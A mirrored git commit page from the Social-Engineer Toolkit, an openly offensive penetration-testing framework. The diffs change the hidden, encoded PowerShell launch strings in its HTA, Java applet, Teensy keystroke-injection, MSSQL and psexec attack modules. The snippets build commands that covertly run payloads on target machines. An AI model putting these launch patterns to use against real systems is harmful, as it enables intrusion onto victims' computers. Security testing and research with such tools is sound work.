Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-03-03 06:47:31 +00:00
Code Issues Projects Releases Packages Wiki Activity

add better handling on powershell encoded command

Browse source
This commit is contained in:
TrustedSec 2016-07-15 23:02:54 -04:00
parent 438e8aff0a
commit 8d3ea4fe1e
8 changed files with 13 additions and 7 deletions
readme
CHANGELOG
src
core
setcore.py
fasttrack
mssql.pypsexec.py
powershell
powershell.py
teensy
powershell_shellcode.py
webattack
hta
main.py
java_applet
Java.java

6
readme/CHANGELOG
View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 7.2.3
~~~~~~~~~~~~~~~~
* added better handling around powershell detection
~~~~~~~~~~~~~~~~
version 7.2.2
~~~~~~~~~~~~~~~~

2
src/core/setcore.py
View file

@ -269,7 +269,7 @@ def print_error(message):
def get_version():
define_version = '7.2.2'
define_version = '7.2.3'
return define_version
class create_menu:

2
src/fasttrack/mssql.py
View file

@ -222,7 +222,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(

2
src/fasttrack/psexec.py
View file

@ -78,7 +78,7 @@ try:
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(

2
src/powershell/powershell.py
View file

@ -46,7 +46,7 @@ if powershell_menu_choice != "99":
# here we format everything for us
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(

2
src/teensy/powershell_shellcode.py
View file

@ -70,7 +70,7 @@ void loop()
delay(5000);
CommandAtRunBar("cmd");
delay(750);
Keyboard.print("powershell -nop -win hidden -noni -enc ");
Keyboard.print("powershell -nop -window hidden -noni -EncodedCommand ");
// Write the binary to the notepad file
int i;
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {

2
src/webattack/hta/main.py
View file

@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = ("powershell -window hidden -enc " + ps) #.decode('ascii'))
command = ("powershell -window hidden -EncodedCommand " + ps)
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website

2
src/webattack/java_applet/Java.java
View file

@ -245,7 +245,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
}